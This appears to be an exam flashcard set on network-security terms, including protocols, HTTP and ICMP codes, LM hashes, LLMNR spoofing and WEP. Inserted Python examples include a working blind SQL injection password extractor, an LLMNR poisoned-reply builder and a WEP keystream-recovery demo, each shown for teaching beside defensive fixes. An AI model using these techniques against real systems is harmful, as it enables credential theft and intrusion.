A concise overview of various network security concepts, protocols and vulnerabilities. It covers topics such as IPsec, TCP/UDP port counts, RFC 1918 address blocks, CVE, CVSS, DREAD, CWE and NVD. Additionally, it includes information on authentication protocols such as LM, Net-NTLM and NTLM, as well as NetBIOS scanning tools and wireless authentication protocols such as PEAP and LEAP. The document also touches on blind SQL injection, LLMNR spoofing, FTP bounce attacks and a few well-known Microsoft security bulletins, offering a broad overview of network security essentials. It is useful for students and professionals in cybersecurity.
Typology: Exams
100 *** Continue
101 *** Switching Protocols
102 *** Processing
Internet Protocol Security (IPsec) *** a secure network protocol suite that authenticates and encrypts the packets of data sent over an Internet Protocol network
Internet Protocol Security (IPsec) *** used in virtual private networks (VPNs)
number of possible TCP ports *** 65536 values (0 to 65535); port 0 is reserved, leaving 65535 usable ports
number of possible UDP ports *** 65536 values (0 to 65535); port 0 is reserved, leaving 65535 usable ports
RFC1918 24-bit block *** 10.0.0.0/8 (10.0.0.0 to 10.255.255.255; one class A)
RFC1918 20-bit block *** 172.16.0.0/12 (172.16.0.0 to 172.31.255.255; 16 contiguous class Bs)
RFC1918 16-bit block *** 192.168.0.0/16 (192.168.0.0 to 192.168.255.255; 256 contiguous class Cs)
Common Vulnerabilities and Exposures (CVE) *** provides a reference-method for publicly known information-security vulnerabilities and exposures
Common Vulnerability Scoring System (CVSS) *** an open industry standard for assessing the severity of computer system security vulnerabilities
DREAD *** a threat risk-rating scheme (Damage, Reproducibility, Exploitability, Affected users, Discoverability) used as part of a system for risk-assessing computer security threats; each factor is scored and the scores are combined into a ranking
Common Weakness Enumeration (CWE) *** a category system for software weaknesses and vulnerabilities
National Vulnerability Database (NVD) *** the U.S. government repository of standards-based vulnerability management data represented using the Security Content Automation Protocol (SCAP)
500 *** Internal Server Error
501 *** Not Implemented
502 *** Bad Gateway
503 *** Service Unavailable
504 *** Gateway Timeout
505 *** HTTP Version Not Supported
511 *** Network Authentication Required
404 *** Not Found
405 *** Method Not Allowed
406 *** Not Acceptable
407 *** Proxy Authentication Required
408 *** Request Timeout
409 *** Conflict
410 *** Gone
411 *** Length Required
413 *** Payload Too Large
426 *** Upgrade Required
429 *** Too Many Requests
threat *** a source of potential disruption, which has the potential to cause a risk
risk *** the combination of consequences of a threat occurring and the likelihood of it doing so
inherent risk *** the risk that an event will occur which may negatively affect the achievement of organisation's objectives, assuming there are no controls in place
residual risk *** the risk which remains after taking controls in to account
Session Initiation Protocol (SIP) *** a signaling protocol used for initiating, maintaining, and terminating real-time sessions that include voice, video and messaging applications
SIP requests *** REGISTER; INVITE; ACK; BYE; CANCEL; UPDATE; REFER; PRACK; SUBSCRIBE; NOTIFY; PUBLISH; MESSAGE; INFO; OPTIONS
IPsec security architecture *** Authentication Headers (AH)
Encapsulating Security Payloads (ESP)
Security Associations (SA) - Internet Security Association and Key Management Protocol (ISAKMP); Internet Key Exchange (IKE and IKEv2)
LM *** all passwords are converted into uppercase before generating the hash value
LM *** password length is limited to maximum of 14 characters
LM *** a 14-character password is broken into 7+7 characters and the hash is calculated for the two halves separately
LM *** if the password is 7 characters or less, the second half of the hash is always the same constant value (AAD3B435B51404EE), which immediately reveals the short length
LM *** the hash is unsalted, so identical passwords always produce identical hashes, and the stored hash is password-equivalent for network authentication
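The LM properties above make a dump triage possible without cracking anything: an all-constant LM field means no LM hash is stored, and a constant second half means the password is seven characters or fewer. The following is an added example, not from the original page; it assumes the usual `user:rid:lm_hash:nt_hash:::` dump layout, and the account lines are constructed.

```python
"""Audit pwdump-style dumps for weak LM hashes. Added example, not from the original page;
the account lines below are constructed and the ``user:rid:lm:nt:::`` layout is assumed."""
import re

# Second half of an LM hash for an empty 7-byte half: DES_k("KGS!@#$%") with the all-zero key.
LM_EMPTY_HALF = "aad3b435b51404ee"
LM_EMPTY_HASH = LM_EMPTY_HALF * 2

PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}|\*+):(?P<nt>[0-9a-fA-F]{32}|\*+):"
)


def classify_lm(lm_hash):
    """Return what the LM field reveals without cracking anything."""
    lm = lm_hash.lower()
    if lm.startswith("*") or lm == LM_EMPTY_HASH:
        # No LM hash stored: LM storage disabled, or the password is longer than 14 characters.
        return "lm-disabled"
    if lm[16:] == LM_EMPTY_HALF:
        # Constant second half: the password is 7 characters or fewer (and case-folded to
        # uppercase by LM), so a single 7-character DES brute force recovers it.
        return "lm-short"
    # Two independent 7-character halves: each half is brute-forced separately.
    return "lm-present"


def audit(lines):
    """Map every parseable dump line to (username, classification); skip malformed lines."""
    results = []
    for line in lines:
        m = PWDUMP_RE.match(line.strip())
        if m:
            results.append((m["user"], classify_lm(m["lm"])))
    return results


# Constructed sample lines (hash values are illustrative, not from a real system).
SAMPLE = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "svc_backup:1105:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::",
    "jsmith:1201:299bd128c1101fd6aad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::",
    "this line is not a dump entry",
]

if __name__ == "__main__":
    for user, verdict in audit(SAMPLE):
        print(f"{user:<16} {verdict}")
```

Any account reported as `lm-present` or `lm-short` is a finding on its own: LM storage should be disabled (the NoLMHash policy) and the affected passwords rotated, since the hash itself is what NTLM network authentication uses.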
nbtstat; nbtscan *** NetBIOS scanning tools:
nbtstat *** a command-line utility built into Windows that displays NetBIOS names and the NetBIOS name table of the local machine or of one remote host at a time
nbtscan *** a NetBIOS name-service scanner with the same function as nbtstat, but it sweeps a range of addresses instead of querying a single host
PEAP *** a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel
LEAP *** a proprietary wireless LAN authentication method developed by Cisco Systems
LEAP *** uses dynamically generated per-session WEP keys and an MS-CHAP-style challenge/response; the exchange is vulnerable to offline dictionary attack (the asleap tool, 2003), so Cisco itself recommends EAP-FAST or PEAP instead
stream cipher (symmetric) *** Rivest Cipher 4 (RC4)
symmetric-key block cipher *** Rivest Cipher 5 (RC5)
symmetric-key block cipher *** Data Encryption Standard (DES)
symmetric-key block cipher *** Advanced Encryption Standard (AES)
Media Access Control (MAC) address *** of a device is a unique identifier assigned to a network interface controller (NIC)
48 bits *** Media Access Control (MAC) address size:
Oracle System ID (SID) *** used to uniquely identify a particular database on a system
rlogin; rcp; rsh *** Berkeley r-commands that share the hosts.equiv and .rhosts access-control scheme
permissions required for copying a file into / out of a directory *** source directory: execute (search) permission to reach the file by name, plus read permission if you need to list the directory or expand a wildcard
source file: read permission
target directory: execute and write permission
target file: no permission is needed if it does not exist yet, because the copy creates it; write permission if the file already exists and is being overwritten
blind SQL injection *** a type of SQL injection attack that asks the database true-or-false questions and infers the answer from the application's response (a different page, or a measurable delay in time-based variants); it is used when the application shows only generic error messages but still builds the query from unsanitised input
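The true/false oracle described above, worked through against an in-memory SQLite table. This is an added example, not from the original page: the `users` table, the `S3cret!` password, and the function names are constructed for illustration. `login_vulnerable` concatenates the username into the statement and returns only a boolean (the "generic error page"); `extract_password` recovers a value one character at a time from that boolean alone, and the parameterised `login_safe` defeats the same probes.

```python
"""Boolean-based blind SQL injection against a deliberately vulnerable query, with the
parameterised fix beside it. Added example; the schema, data and function names are
constructed for illustration and are not from the original page."""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret!'), ('bob', 'hunter2')")
    return db


def login_vulnerable(db, username):
    # String concatenation: attacker-controlled text becomes part of the SQL statement.
    sql = "SELECT 1 FROM users WHERE username = '%s'" % username
    # Only True/False leaves the function: exactly the situation of a generic error page.
    return db.execute(sql).fetchone() is not None


def login_safe(db, username):
    # Placeholder binding: the value is sent separately from the statement, so a quote
    # inside it can never terminate the literal or append SQL.
    sql = "SELECT 1 FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchone() is not None


CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*"


def extract_password(oracle, target_user="admin", max_len=16):
    """Recover a password one character at a time using only the oracle's True/False answer."""
    recovered = ""
    for pos in range(1, max_len + 1):
        found = False
        for ch in CHARSET:
            # The probe closes the username literal, then asks one yes/no question.
            # SQLite compares TEXT with BINARY collation, so case is distinguished.
            probe = (f"' OR (SELECT SUBSTR(password,{pos},1) FROM users "
                     f"WHERE username='{target_user}') = '{ch}'--")
            if oracle(probe):
                recovered += ch
                found = True
                break
        if not found:
            break  # SUBSTR past the end returns '', which matches nothing: password complete
    return recovered


def demo():
    """Return what the attack recovers from the vulnerable login and from the safe one."""
    db = make_db()
    leaked = extract_password(lambda u: login_vulnerable(db, u))
    nothing = extract_password(lambda u: login_safe(db, u))
    return leaked, nothing


if __name__ == "__main__":
    print(demo())
```

The per-character loop issues at most `len(CHARSET)` queries per position; real tooling binary-searches the character code and uses time delays when even the true/false page difference is unavailable. The fix is the same in every case: bind values with placeholders rather than formatting them into the query text.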
Link-Local Multicast Name Resolution (LLMNR) *** a protocol (RFC 4795, implemented by Microsoft Windows) based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to resolve names of hosts on the same local link; Windows falls back to it when DNS cannot resolve a name
Network Basic Input/Output System (NetBIOS) name service *** identifies systems on a local network by their NetBIOS name
LLMNR spoofing *** adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355) / NBT-NS (UDP 137) traffic as if they knew the identity of the requested host, effectively poisoning the service so that the victims communicate with the adversary-controlled system. If the requested host belongs to a resource that requires authentication, the username and a Net-NTLMv2 challenge/response (often loosely called the "NTLMv2 hash") are sent to the adversary-controlled system, where they can be cracked offline or relayed to another service.
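Because LLMNR reuses the DNS wire format, the query and the poisoned reply can be built and decoded with a few dozen lines. The following is an added example, not from the original page: `fileshare01`, the transaction ID and the address 10.0.0.66 are constructed, not captured, and the helper names are mine. It encodes a victim's multicast query, the attacker's unicast answer that claims the name, and parses both.

```python
"""Encode and decode LLMNR messages (RFC 4795 reuses the DNS wire format) and show what a
poisoned reply looks like. Added example; host names, IPs and byte strings are constructed,
not captured from a real network. Name compression (0xC0 pointers) is not handled."""
import struct

LLMNR_MCAST_V4 = "224.0.0.252"  # queries go here; responses are unicast back to the querier
LLMNR_PORT = 5355


def encode_name(name):
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(buf, off):
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            break
        labels.append(buf[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def build_query(txid, name):
    # Header: ID, flags (QR=0 means query), QDCOUNT=1, ANCOUNT=0, NSCOUNT=0, ARCOUNT=0
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # QTYPE A, QCLASS IN


def build_response(txid, name, ipv4, ttl=30):
    # A responder echoes the victim's transaction ID; the poisoner simply does the same.
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)    # QR=1: response, one answer
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(o) for o in ipv4.split("."))
    answer = encode_name(name) + struct.pack("!HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answer


def parse(buf):
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", buf[:12])
    off = 12
    msg = {"id": txid, "is_response": bool(flags & 0x8000), "questions": [], "answers": []}
    for _ in range(qd):
        name, off = decode_name(buf, off)
        qtype, qclass = struct.unpack("!HH", buf[off:off + 4])
        off += 4
        msg["questions"].append((name, qtype))
    for _ in range(an):
        name, off = decode_name(buf, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        off += 10
        rdata = buf[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)
        msg["answers"].append((name, rtype, ttl, rdata))
    return msg


def poisoning_exchange():
    """Victim asks the link for a name DNS could not resolve; only the attacker answers."""
    victim_query = build_query(0x1A2B, "fileshare01")               # to 224.0.0.252:5355
    attacker_reply = build_response(0x1A2B, "fileshare01", "10.0.0.66")  # unicast to victim
    return parse(victim_query), parse(attacker_reply)


if __name__ == "__main__":
    q, r = poisoning_exchange()
    print("query   :", q)
    print("response:", r)
```

Nothing in the exchange authenticates the responder, which is the whole problem. The practical fixes are to disable LLMNR through Group Policy ("Turn off multicast name resolution", i.e. `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast = 0`), disable NetBIOS over TCP/IP on the adapters, and require SMB signing so a captured response cannot be relayed.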
Internet Explorer *** MS10-002 basis
Aurora *** MS10-002 name
KiTrap0D *** MS10-015 name
Print Spooler Service *** MS10-061 basis
Created *** 201
Accepted *** 202
Non-Authoritative Information *** 203
No Content *** 204
Reset Content *** 205
300 *** Multiple Choices
301 *** Moved Permanently
302 *** Found
307 *** Temporary Redirect
308 *** Permanent Redirect
0 *** Echo Reply
3 *** Destination Unreachable
4 *** Source Quench
5 *** Redirect Message
8 *** Echo Request
9 *** Router Advertisement
10 *** Router Solicitation
11 *** Time Exceeded
30 *** Traceroute
42 *** Extended Echo Request
IEEE 802.11 *** part of the IEEE 802 set of LAN protocols; it specifies the media access control (MAC) and physical layer protocols for implementing wireless local area network (WLAN, Wi-Fi) communication in various frequency bands, including but not limited to 2.4, 5 and 60 GHz
Kismet *** passive scanner on Linux
Wired Equivalent Privacy (WEP) *** both WEP-40 and WEP-104 were deprecated in 2004 (IEEE 802.11i)
Temporal Key Integrity Protocol (TKIP) *** deprecated in 2012
Wi-Fi Protected Access / Wi-Fi Protected Access II (WPA/WPA2) *** defined in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP)
Extensible Authentication Protocol (EAP) *** an authentication framework frequently used in wireless networks and point-to-point connections
Lightweight Extensible Authentication Protocol (LEAP) *** a proprietary wireless LAN authentication method developed by Cisco
Protected Extensible Authentication Protocol (PEAP) *** a protocol that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel
Teletype Network (Telnet) *** a protocol used on the Internet or local area network to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection
Teletype Network (Telnet) *** does not encrypt any traffic sent over the connection by default
Hypertext Transfer Protocol (HTTP) *** an application protocol for distributed, collaborative, hypermedia information systems
Hypertext Transfer Protocol (HTTP) *** does not encrypt any traffic sent over the connection
Hypertext Transfer Protocol Secure (HTTPS) *** HTTP carried over a TLS (formerly SSL) connection, providing confidentiality, integrity and server authentication; widely used on the Internet
File Transfer Protocol (FTP) *** a standard network protocol used for the transfer of computer files between a client and server on a computer network
File Transfer Protocol (FTP) *** does not encrypt any traffic sent over the connection
Secure Shell (SSH) *** a cryptographic network protocol for operating network services securely over an unsecured network
Simple Network Management Protocol (SNMP) *** an Internet Standard protocol for collecting and organising information about managed devices on IP networks and for modifying that information to change device behaviour
using SNMP to attack a network *** the SNMP implementation in Cisco IOS releases 11.0 and 12.0 was vulnerable to certain denial-of-service attacks
SNMP authentication *** SNMP v1 and v2c authenticate with a community string (the only credential) that travels in clear text in every message; anyone who can sniff the traffic learns it
SNMP autodiscovery *** discovery tools that sweep a network with v1/v2c requests send the community string in clear text to every device they probe; only SNMPv3 in authPriv mode provides real authentication and encryption
C:\windows\system32\config\SAM *** password hashes (Windows):
/etc/shadow *** password hashes (Unix):
domain information, registrant contact, administrative contact, technical contact *** information contained within IP and domain registries (WHOIS)
DNS zone transfer *** one of many mechanisms available for administrators to replicate DNS databases across a set of DNS servers
zone *** the portion of the database that is replicated
Start Of [a zone of] Authority (SOA) *** specifies authoritative information about a DNS zone
Mail eXchange (MX) *** domain to mail server
Text (TXT) *** originally free-form text; today it mostly carries machine-readable data such as SPF, DKIM and DMARC mail policies and domain-ownership verification tokens
Address (A) *** domain to IP
Name Server (NS) *** domain to a set of name servers
Pointer (PTR) *** IP to a domain
HINFO *** intended to provide information about host CPU type and operating system
Canonical Name (CNAME) *** maps an alias name to a canonical domain name (not directly to an IP); the resolver then follows the canonical name's A or AAAA record
Usenet newsgroup *** a repository, usually within the Usenet system, for messages posted by many users in different locations over the Internet
-rwxr-xr-x *** a regular file whose user class has full permissions and whose group and others classes have only the read and execute permissions
0740 *** -rwxr-----
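The two permission cards above (the rwx notation here, and the earlier card on what is needed to copy a file into or out of a directory) are combined in the following added example, which is not from the original page. It converts between symbolic and octal modes, including setuid/setgid/sticky, and evaluates a copy against the owner/group/other class that Unix actually applies. The users `alice` and `root`, the group `dev` and the modes are constructed.

```python
"""Convert between symbolic (ls -l) and octal permission notation and evaluate whether a
given user may copy a file into a directory. Added example; the principals, groups and
modes are constructed. Unix applies the FIRST matching class (owner, then group, then
other), not a union of them, and root bypasses the mode bits entirely."""
import stat

R, W, X = 4, 2, 1


def symbolic_to_mode(sym):
    """'-rwxr-x---' -> 0o750; s/S, t/T in the usual positions set setuid, setgid, sticky."""
    if len(sym) != 10:
        raise ValueError("expected 10 characters, e.g. -rwxr-xr-x")
    special = {2: stat.S_ISUID, 5: stat.S_ISGID, 8: stat.S_ISVTX}
    mode = 0
    for i, ch in enumerate(sym[1:]):           # index 0..8 = ugo x rwx; bit = 1 << (8 - i)
        if ch in "rwx":
            mode |= 1 << (8 - i)
        elif ch in "sStT":
            mode |= special[i]
            if ch in "st":                      # lowercase means the execute bit is also set
                mode |= 1 << (8 - i)
        elif ch != "-":
            raise ValueError("bad permission character %r" % ch)
    return mode


def mode_to_symbolic(mode, ftype="-"):
    out = [ftype] + [c if mode & (1 << (8 - i)) else "-" for i, c in enumerate("rwxrwxrwx")]
    if mode & stat.S_ISUID:
        out[3] = "s" if out[3] == "x" else "S"
    if mode & stat.S_ISGID:
        out[6] = "s" if out[6] == "x" else "S"
    if mode & stat.S_ISVTX:
        out[9] = "t" if out[9] == "x" else "T"
    return "".join(out)


class Obj:
    def __init__(self, mode, owner, group):
        self.mode, self.owner, self.group = mode, owner, group


class Principal:
    def __init__(self, user, groups):
        self.user, self.groups = user, set(groups)


def effective(principal, obj):
    """The rwx triplet that applies to this principal for this object."""
    if principal.user == "root":
        return R | W | X
    if principal.user == obj.owner:
        return (obj.mode >> 6) & 7
    if obj.group in principal.groups:
        return (obj.mode >> 3) & 7
    return obj.mode & 7


def can_copy(principal, src_dir, src_file, dst_dir, dst_file=None, list_source=False):
    """Search the source dir (plus read if listing/globbing), read the source file,
    search+write the target dir, and write the target file only if it already exists."""
    need_src_dir = X | (R if list_source else 0)
    checks = [
        effective(principal, src_dir) & need_src_dir == need_src_dir,
        bool(effective(principal, src_file) & R),
        effective(principal, dst_dir) & (W | X) == (W | X),
    ]
    if dst_file is not None:
        checks.append(bool(effective(principal, dst_file) & W))
    return all(checks)


def demo():
    """alice (group dev) copies /srv/data/report.csv into /var/www (fails) and /tmp (succeeds)."""
    alice = Principal("alice", ["dev"])
    src_dir = Obj(symbolic_to_mode("drwxr-x---"), "root", "dev")
    src_file = Obj(symbolic_to_mode("-rw-r-----"), "root", "dev")
    www = Obj(symbolic_to_mode("drwxr-xr-x"), "root", "root")
    tmp = Obj(symbolic_to_mode("drwxrwxrwt"), "root", "root")
    return can_copy(alice, src_dir, src_file, www), can_copy(alice, src_dir, src_file, tmp)


if __name__ == "__main__":
    print(oct(symbolic_to_mode("-rwxr-----")), mode_to_symbolic(0o4755), demo())
```

Note the first-match rule in `effective`: an owner whose own class lacks a bit is denied even if the group class grants it, which is why `-r--rwx---` is a real (if odd) way to lock the owner out of writing their own file.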
archive, hidden, system, read-only *** traditionally, in Microsoft Windows, files and folders accepted four attributes:
filesystem Access Control List (ACL) *** a data structure (usually a table) containing entries that specify individual user or group rights to specific system objects such as programmes, processes, or files
encryption *** transforms data into another format in such a way that only the holder(s) of the corresponding key can reverse the transformation
encoding *** transforms data into another format using a publicly known scheme (Base64, URL encoding, hex) so that anyone can reverse it; it provides no confidentiality and is not a security control
symmetric encryption *** uses the same cryptographic keys for both encryption of plaintext and decryption of ciphertext
asymmetric encryption *** uses pairs of keys: public keys which may be disseminated widely, and private keys which are known only to the owner
symmetric-key block cipher *** DES - Data Encryption Standard
Message-Digest algorithm (MD5) *** hash function producing a 128-bit hash value
512 bits *** MD5 block sizes:
message authentication code (MAC) *** a short piece of information used to authenticate a message, in other words to confirm that the message came from the stated sender (its authenticity) and has not been changed (its integrity); sometimes called a message integrity code to avoid confusion with a MAC address
Hash-based Message Authentication Code (HMAC) *** a specific type of Message Authentication Code (MAC) involving a cryptographic hash function and a secret cryptographic key
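The HMAC construction is short enough to write out from its RFC 2104 definition, H((K xor opad) || H((K xor ipad) || m)), and compare with the standard library. The following is an added example, not from the original page; the key and message are the first RFC 4231 test vector, and `verify` shows the constant-time comparison that any tag check should use.

```python
"""HMAC built by hand from its RFC 2104 definition, H((K ^ opad) || H((K ^ ipad) || m)),
cross-checked against the standard library and used with a constant-time comparison.
Added example, not from the original page; the sample key and message are the first
RFC 4231 test vector."""
import hashlib
import hmac


def hmac_manual(key, msg, hashfn=hashlib.sha256):
    block = hashfn().block_size              # 64 bytes for MD5, SHA-1 and SHA-256
    if len(key) > block:
        key = hashfn(key).digest()           # keys longer than a block are hashed first
    key = key.ljust(block, b"\x00")          # shorter keys are zero-padded to the block size
    ipad = bytes(b ^ 0x36 for b in key)
    opad = bytes(b ^ 0x5C for b in key)
    inner = hashfn(ipad + msg).digest()
    return hashfn(opad + inner).digest()


def verify(key, msg, tag):
    """Compare tags in constant time: an early-exit `==` leaks how many leading bytes match."""
    return hmac.compare_digest(hmac_manual(key, msg), tag)


def matches_stdlib(key, msg, name="sha256"):
    """Cross-check the hand-written construction against hmac.new for the same inputs."""
    expected = hmac.new(key, msg, getattr(hashlib, name)).digest()
    return hmac_manual(key, msg, getattr(hashlib, name)) == expected


# RFC 4231 test case 1 (HMAC-SHA-256)
RFC4231_KEY = b"\x0b" * 20
RFC4231_MSG = b"Hi There"
RFC4231_TAG = "b0344c61d8db38535ca8afceaf0bf12b881dc200c9833da726e9376c2e32cff7"

if __name__ == "__main__":
    tag = hmac_manual(RFC4231_KEY, RFC4231_MSG)
    print(tag.hex(), tag.hex() == RFC4231_TAG)
    print("tampered message accepted:", verify(RFC4231_KEY, b"Hi There!", tag))
```

The two nested hashes are what make HMAC safe where the naive H(key || message) is not: with a Merkle-Damgard hash such as MD5 or SHA-1, H(key || message) lets an attacker who knows one valid tag append data and compute a valid tag for the extended message without the key (a length-extension attack), while the outer hash over the secret-keyed inner digest blocks that.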
firewall *** a network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules
firewall *** often categorised as either network firewalls or host-based firewalls
network access control list *** a network filter utilised by routers and some switches to permit and restrict data flows into and out of network interfaces
router *** a networking device that forwards data packets between computer networks
switch *** a computer networking device that connects devices on a computer network by using packet switching to receive, process, and forward data to the destination device
Secure Sockets Layer (SSL) *** the predecessor of Transport Layer Security (TLS), a set of cryptographic protocols designed to provide communications security over a computer network; every SSL version is now deprecated (SSL 3.0 by RFC 7568, 2015), although the name survives in phrases such as "SSL certificate"
Internet Protocol Security (IPsec) *** a secure network protocol suite that authenticates and encrypts the packets of data sent over an Internet protocol network which is used in Virtual Private Networks (VPNs)
Secure Shell (SSH) *** a cryptographic network protocol for operating network services securely over an unsecured network
Secure Shell (SSH) *** typical applications include remote command-line login and remote command execution, but any network service can be secured with SSH
Pretty Good Privacy (PGP) *** an encryption programme that provides cryptographic privacy and authentication for data communication
Pretty Good Privacy (PGP) *** used for signing, encrypting and decrypting texts, emails, files, directories and whole disk partitions, and to increase the security of email communications
Wired Equivalent Privacy (WEP) *** standard 64-bit WEP uses a 40 bit key (also known as WEP-40), which is concatenated with a 24-bit initialisation vector (IV) to form the RC4 key
Temporal Key Integrity Protocol (TKIP) *** designed as an interim solution to replace WEP without requiring the replacement of legacy hardware
Wi-Fi Protected Access (WPA) *** defined in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP)
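The WEP card above explains the key layout: the 24-bit IV is sent in the clear and prepended to the shared key to form the RC4 key for each frame. The following added example (not from the original page; the key, IV and frame contents are constructed) implements RC4 from its definition, builds WEP-style frames, and shows the consequence of the small IV space: two frames under the same IV share a keystream, so XORing their ciphertexts yields the XOR of the plaintexts, and one known plaintext decrypts the other without the key. The CRC-32 integrity value of real WEP is omitted because it does not change the keystream argument.

```python
"""RC4 keystream reuse in WEP: the per-frame key is IV || shared key, so two frames sent
under the same 24-bit IV are encrypted with the same keystream. Added example with a
constructed key and plaintexts; RC4 is written out because the standard library has none."""


def rc4_keystream(key, n):
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA)
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key, iv, plaintext):
    """WEP-40/WEP-104: 3-byte IV in the clear, prepended to the 5- or 13-byte key for RC4.
    (Real WEP also appends a CRC-32 ICV before encrypting; omitted here.)"""
    if len(iv) != 3 or len(shared_key) not in (5, 13):
        raise ValueError("WEP uses a 24-bit IV and a 40- or 104-bit key")
    return iv + xor(rc4_keystream(iv + shared_key, len(plaintext)), plaintext)


def wep_decrypt(shared_key, frame):
    iv, body = frame[:3], frame[3:]
    return xor(rc4_keystream(iv + shared_key, len(body)), body)


def keystream_reuse_leak(frame1, frame2):
    """Same IV => same keystream => C1 ^ C2 == P1 ^ P2, computed without the key."""
    if frame1[:3] != frame2[:3]:
        return None
    return xor(frame1[3:], frame2[3:])


def recover_with_known_plaintext(frame_known, known_plaintext, frame_target):
    """keystream = C1 ^ P1 (a predictable header is enough); then P2 = C2 ^ keystream."""
    ks = xor(frame_known[3:], known_plaintext)
    return xor(frame_target[3:], ks)


def demo():
    key = b"\x01\x02\x03\x04\x05"        # constructed 40-bit shared key
    iv = b"\x00\x00\x01"                 # the same IV reused on two frames
    p1 = b"GET /index.html "             # predictable traffic the attacker can guess
    p2 = b"user=admin&pw=x1"             # the frame the attacker actually wants
    c1, c2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    leak_ok = keystream_reuse_leak(c1, c2) == xor(p1, p2)
    recovered_ok = recover_with_known_plaintext(c1, p1, c2) == p2
    return leak_ok, recovered_ok


if __name__ == "__main__":
    print(demo())
```

With only 2^24 IVs, a busy access point repeats one after a few thousand frames (the birthday bound is roughly 5,000), and many drivers simply counted upward from zero, so collisions were guaranteed rather than probable. This keystream reuse, together with the related-key weaknesses in RC4's key schedule that the FMS and PTW attacks exploit, is why WEP was deprecated in favour of TKIP and then CCMP (AES).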
egress filtering *** the practice of monitoring and potentially restricting the flow of information outbound from one network to another
egress filtering *** TCP/IP packets that are being sent out of the internal network are examined via a router, firewall, or similar edge device